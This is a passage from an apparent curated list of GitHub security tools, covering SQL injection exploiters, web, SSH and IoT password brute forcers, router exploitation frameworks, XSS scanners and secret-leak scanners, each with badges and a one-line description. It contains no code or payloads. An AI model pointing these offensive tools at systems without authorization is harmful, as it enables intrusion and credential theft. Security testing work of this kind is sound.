stars](https://img.shields.io/github/stars/stampery/mongoaudit?style=flat-square) ![GitHub](https://img.shields.io/github/license/stampery/mongoaudit?style=flat-square)\n\n- https://github.com/missDronio/blindy - **Simple script to automate brutforcing blind sql injection vulnerabilities**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/missDronio/blindy?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/missDronio/blindy?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/missDronio/blindy?style=flat-square) ![GitHub](https://img.shields.io/github/license/missDronio/blindy?style=flat-square)\n\n- https://github.com/fengxuangit/Fox-scan - **A initiative and passive SQL injection vulnerable test tools**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/fengxuangit/Fox-scan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/fengxuangit/Fox-scan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/fengxuangit/Fox-scan?style=flat-square) ![GitHub](https://img.shields.io/github/license/fengxuangit/Fox-scan?style=flat-square)\n\n- https://github.com/JohnTroony/Blisqy - **Exploit time-based blind-SQL injection in HTTP-Headers**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/JohnTroony/Blisqy?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/JohnTroony/Blisqy?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/JohnTroony/Blisqy?style=flat-square) ![GitHub](https://img.shields.io/github/license/JohnTroony/Blisqy?style=flat-square)\n\n- https://github.com/ron190/jsql-injection - **A lightweight application used to find database information from a distant server**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ron190/jsql-injection?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ron190/jsql-injection?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ron190/jsql-injection?style=flat-square) ![GitHub](https://img.shields.io/github/license/ron190/jsql-injection?style=flat-square)\n\n- https://github.com/Hadesy2k/sqliv - **Massive SQL injection vulnerability scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Hadesy2k/sqliv?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Hadesy2k/sqliv?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Hadesy2k/sqliv?style=flat-square) ![GitHub](https://img.shields.io/github/license/Hadesy2k/sqliv?style=flat-square)\n\n- https://github.com/s0md3v/sqlmate - **A friend of SQLmap which will do what you always expected from SQLmap**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/s0md3v/sqlmate?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/s0md3v/sqlmate?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/s0md3v/sqlmate?style=flat-square) ![GitHub](https://img.shields.io/github/license/s0md3v/sqlmate?style=flat-square)\n\n- https://github.com/m8r0wn/enumdb - **MySQL and MSSQL brute force and post exploitation tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/m8r0wn/enumdb?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/m8r0wn/enumdb?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/m8r0wn/enumdb?style=flat-square) ![GitHub](https://img.shields.io/github/license/m8r0wn/enumdb?style=flat-square)\n\n- https://github.com/tariqhawis/injectbot - **A web-based, easy-to-use, SQL injection scanner and exploiter tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/tariqhawis/injectbot?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/tariqhawis/injectbot?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/tariqhawis/injectbot?style=flat-square) ![GitHub](https://img.shields.io/github/license/tariqhawis/injectbot?style=flat-square)\n\n\n### Weak Usernames or Passwords Enumeration For Web\n\n- https://github.com/lijiejie/htpwdScan - **A python HTTP weak pass scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lijiejie/htpwdScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lijiejie/htpwdScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lijiejie/htpwdScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/lijiejie/htpwdScan?style=flat-square)\n\n- https://github.com/netxfly/crack_ssh - **SSH, Redis, mongoDB weak password bruteforcer**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/netxfly/crack_ssh?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/netxfly/crack_ssh?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/netxfly/crack_ssh?style=flat-square) ![GitHub](https://img.shields.io/github/license/netxfly/crack_ssh?style=flat-square)\n\n- https://github.com/shengqi158/weak_password_detect - **A python HTTP weak password scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/shengqi158/weak_password_detect?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/shengqi158/weak_password_detect?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/shengqi158/weak_password_detect?style=flat-square) ![GitHub](https://img.shields.io/github/license/shengqi158/weak_password_detect?style=flat-square)\n\n- https://github.com/s0md3v/Blazy - **a modern login bruteforcer which also tests for CSRF, Clickjacking, Cloudflare and WAF**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/s0md3v/Blazy?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/s0md3v/Blazy?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/s0md3v/Blazy?style=flat-square) ![GitHub](https://img.shields.io/github/license/s0md3v/Blazy?style=flat-square)\n\n- https://github.com/MooseDojo/myBFF - **Web application brute force framework,supports Citrix Gateway,CiscoVPN and so on**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/MooseDojo/myBFF?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/MooseDojo/myBFF?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/MooseDojo/myBFF?style=flat-square) ![GitHub](https://img.shields.io/github/license/MooseDojo/myBFF?style=flat-square)\n\n- https://github.com/TideSec/web_pwd_common_crack - **A common web weak_password cracking script,can detect batches of management backgrounds without verification codes**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/TideSec/web_pwd_common_crack?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/TideSec/web_pwd_common_crack?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/TideSec/web_pwd_common_crack?style=flat-square) ![GitHub](https://img.shields.io/github/license/TideSec/web_pwd_common_crack?style=flat-square)\n\n\n### Authorization Brute Force or Vulnerability Scan For IoT\n\n- https://github.com/rapid7/IoTSeeker - **Weak-password IoT devices scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Perl-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/rapid7/IoTSeeker?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/rapid7/IoTSeeker?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/rapid7/IoTSeeker?style=flat-square) ![GitHub](https://img.shields.io/github/license/rapid7/IoTSeeker?style=flat-square)\n\n- https://github.com/shodan-labs/iotdb - **IoT Devices scanner via nmap**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-XML-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/shodan-labs/iotdb?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/shodan-labs/iotdb?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/shodan-labs/iotdb?style=flat-square) ![GitHub](https://img.shields.io/github/license/shodan-labs/iotdb?style=flat-square)\n\n- https://github.com/googleinurl/RouterHunterBR - **Testing vulnerabilities in devices and routers connected to the Internet**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/googleinurl/RouterHunterBR?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/googleinurl/RouterHunterBR?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/googleinurl/RouterHunterBR?style=flat-square) ![GitHub](https://img.shields.io/github/license/googleinurl/RouterHunterBR?style=flat-square)\n\n- https://github.com/scu-igroup/telnet-scanner - **Weak telnet password scanner based on password enumeration**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/scu-igroup/telnet-scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/scu-igroup/telnet-scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/scu-igroup/telnet-scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/scu-igroup/telnet-scanner?style=flat-square)\n\n- https://github.com/viraintel/OWASP-Nettacker - **Network information gathering vulnerability scanner,most useful to scan IoT**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/viraintel/OWASP-Nettacker?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/viraintel/OWASP-Nettacker?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/viraintel/OWASP-Nettacker?style=flat-square) ![GitHub](https://img.shields.io/github/license/viraintel/OWASP-Nettacker?style=flat-square)\n\n- https://github.com/threat9/routersploit - **Exploitation Framework for embedded Devices,such as router**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/threat9/routersploit?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/threat9/routersploit?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/threat9/routersploit?style=flat-square) ![GitHub](https://img.shields.io/github/license/threat9/routersploit?style=flat-square)\n\n- https://github.com/w3h/icsmaster/tree/master/nse - **Digital bond's ICS enumeration tools**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-NSE-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/w3h/icsmaster?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/w3h/icsmaster?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/w3h/icsmaster?style=flat-square) ![GitHub](https://img.shields.io/github/license/w3h/icsmaster?style=flat-square)\n\n- https://github.com/firmianay/firmeye - **An IDA plug-in, based on sensitive function parameter backtracking to assist in vulnerability mining**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/firmianay/firmeye?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/firmianay/firmeye?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/firmianay/firmeye?style=flat-square) ![GitHub](https://img.shields.io/github/license/firmianay/firmeye?style=flat-square)\n\n\n### Mutiple types of Cross-site scripting Detection\n\n- https://github.com/0x584A/fuzzXssPHP - **A very simple reflected XSS scanner supports GET/POST**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/0x584A/fuzzXssPHP?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/0x584A/fuzzXssPHP?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/0x584A/fuzzXssPHP?style=flat-square) ![GitHub](https://img.shields.io/github/license/0x584A/fuzzXssPHP?style=flat-square)\n\n- https://github.com/chuhades/xss_scan - **Reflected XSS scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/chuhades/xss_scan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/chuhades/xss_scan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/chuhades/xss_scan?style=flat-square) ![GitHub](https://img.shields.io/github/license/chuhades/xss_scan?style=flat-square)\n\n- https://github.com/BlackHole1/autoFindXssAndCsrf - **A plugin for browser that checks automatically whether a page haves XSS and CSRF vulnerabilities**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-JavaScript-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/BlackHole1/autoFindXssAndCsrf?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/BlackHole1/autoFindXssAndCsrf?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/BlackHole1/autoFindXssAndCsrf?style=flat-square) ![GitHub](https://img.shields.io/github/license/BlackHole1/autoFindXssAndCsrf?style=flat-square)\n\n- https://github.com/shogunlab/shuriken - **XSS command line tool for testing lists of XSS payloads on web apps**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/shogunlab/shuriken?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/shogunlab/shuriken?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/shogunlab/shuriken?style=flat-square) ![GitHub](https://img.shields.io/github/license/shogunlab/shuriken?style=flat-square)\n\n- https://github.com/s0md3v/XSStrike - **Fuzz and bruteforce parameters for XSS, WAFs detect and bypass**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/s0md3v/XSStrike?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/s0md3v/XSStrike?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/s0md3v/XSStrike?style=flat-square) ![GitHub](https://img.shields.io/github/license/s0md3v/XSStrike?style=flat-square)\n\n- https://github.com/stamparm/DSXS - **A fully functional cross-site scripting vulnerability scanner,supporting GET and POST parameters,and written in under 100 lines of code**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/stamparm/DSXS?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/stamparm/DSXS?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/stamparm/DSXS?style=flat-square) ![GitHub](https://img.shields.io/github/license/stamparm/DSXS?style=flat-square)\n\n- https://github.com/fcavallarin/domdig - **DOM XSS scanner for Single Page Applications**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Node.js-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/fcavallarin/domdig?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/fcavallarin/domdig?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/fcavallarin/domdig?style=flat-square) ![GitHub](https://img.shields.io/github/license/fcavallarin/domdig?style=flat-square)\n\n- https://github.com/lwzSoviet/NoXss - **Faster reflected-xss and dom-xss scanner based on Phantomjs**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lwzSoviet/NoXss?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lwzSoviet/NoXss?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lwzSoviet/NoXss?style=flat-square) ![GitHub](https://img.shields.io/github/license/lwzSoviet/NoXss?style=flat-square)\n\n- https://github.com/pwn0sec/PwnXSS - **A powerful XSS scanner made in python 3.7**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/pwn0sec/PwnXSS?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/pwn0sec/PwnXSS?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/pwn0sec/PwnXSS?style=flat-square) ![GitHub](https://img.shields.io/github/license/pwn0sec/PwnXSS?style=flat-square)\n\n- https://github.com/hahwul/dalfox - **Parameter Analysis and XSS Scanning tool based on golang**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/hahwul/dalfox?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/hahwul/dalfox?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/hahwul/dalfox?style=flat-square) ![GitHub](https://img.shields.io/github/license/hahwul/dalfox?style=flat-square)\n\n\n### Enterprise sensitive information Leak Scan\n\n- https://github.com/x0day/Multisearch-v2 - **Enterprise assets collector based on search engine**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/x0day/Multisearch-v2?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/x0day/Multisearch-v2?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/x0day/Multisearch-v2?style=flat-square) ![GitHub](https://img.shields.io/github/license/x0day/Multisearch-v2?style=flat-square)\n\n- https://github.com/Ekultek/Zeus-Scanner - **An advanced dork searching tool that is capable of finding IP address /URL blocked by search engine,and can run sqlmap and nmap scans on the URL's**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Ekultek/Zeus-Scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Ekultek/Zeus-Scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Ekultek/Zeus-Scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/Ekultek/Zeus-Scanner?style=flat-square)\n\n- https://github.com/metac0rtex/GitHarvester - **Used for harvesting information from GitHub**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/metac0rtex/GitHarvester?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/metac0rtex/GitHarvester?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/metac0rtex/GitHarvester?style=flat-square) ![GitHub](https://img.shields.io/github/license/metac0rtex/GitHarvester?style=flat-square)\n\n- https://github.com/repoog/GitPrey - **Searching sensitive files and contents in GitHub**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/repoog/GitPrey?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/repoog/GitPrey?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/repoog/GitPrey?style=flat-square) ![GitHub](https://img.shields.io/github/license/repoog/GitPrey?style=flat-square)\n\n- https://github.com/0xbug/Hawkeye - **Github leak scan for enterprise**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/0xbug/Hawkeye?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/0xbug/Hawkeye?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/0xbug/Hawkeye?style=flat-square) ![GitHub](https://img.shields.io/github/license/0xbug/Hawkeye?style=flat-square)\n\n- https://github.com/UnkL4b/GitMiner - **Advanced search tool and automation in Github**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/UnkL4b/GitMiner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/UnkL4b/GitMiner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/UnkL4b/GitMiner?style=flat-square) ![GitHub](https://img.shields.io/github/license/UnkL4b/GitMiner?style=flat-square)\n\n- https://github.com/dxa4481/truffleHog - **Searches high entropy strings through git repositories**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/dxa4481/truffleHog?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/dxa4481/truffleHog?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/dxa4481/truffleHog?style=flat-square) ![GitHub](https://img.shields.io/github/license/dxa4481/truffleHog?style=flat-square)\n\n- https://github.com/1N3/Goohak - **Automatically launch Google hacking queries against a target domain**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/1N3/Goohak?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/1N3/Goohak?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/1N3/Goohak?style=flat-square) ![GitHub](https://img.shields.io/github/license/1N3/Goohak?style=flat-square)\n\n- https://github.com/UKHomeOffice/repo-security-scanner - **CLI tool that finds secrets accidentally committed to a git repo, eg passwords, private keys**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/UKHomeOffice/repo-security-scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/UKHomeOffice/repo-security-scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/UKHomeOffice/repo-security-scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/UKHomeOffice/repo-security-scanner?style=flat-square)\n\n- https://github.com/FeeiCN/GSIL - **Github sensitive information leakage scan**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/FeeiCN/GSIL?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/FeeiCN/GSIL?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/FeeiCN/GSIL?style=flat-square) ![GitHub](https://img.shields.io/github/license/FeeiCN/GSIL?style=flat-square)\n\n- https://github.com/MiSecurity/x-patrol - **Github leaked patrol**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/MiSecurity/x-patrol?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/MiSecurity/x-patrol?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/MiSecurity/x-patrol?style=flat-square) ![GitHub](https://img.shields.io/github/license/MiSecurity/x-patrol?style=flat-square)\n\n- https://github.com/anshumanbh/git-all-secrets - **A tool to capture all the git secrets by leveraging multiple open source git searching tools**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/anshumanbh/git-all-secrets?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/anshumanbh/git-all-secrets?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/anshumanbh/git-all-secrets?style=flat-square) ![GitHub](https://img.shields.io/github/license/anshumanbh/git-all-secrets?style=flat-square)\n\n- https://github.com/VKSRC/Github-Monitor - **Github sensitive information leakage monitor by vipkid SRC**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/FeeiCN/GSIL?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/FeeiCN/GSIL?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/FeeiCN/GSIL?style=flat-square) ![GitHub](https://img.shields.io/github/license/FeeiCN/GSIL?style=flat-square)\n\n- https://github.com/eth0izzle/shhgit - **A docker and web based monitor for finding secrets and sensitive files across GitHub**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/eth0izzle/shhgit?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/eth0izzle/shhgit?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/eth0izzle/shhgit?style=flat-square) ![GitHub](https://img.shields.io/github/license/eth0izzle/shhgit?style=flat-square)\n\n- https://github.com/SAP/credential-digger - **A GitHub scanning tool that identifies hardcoded credentials, filtering the false positive data through machine learning models**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/SAP/credential-digger?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/SAP/credential-digger?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/SAP/credential-digger?style=flat-square) 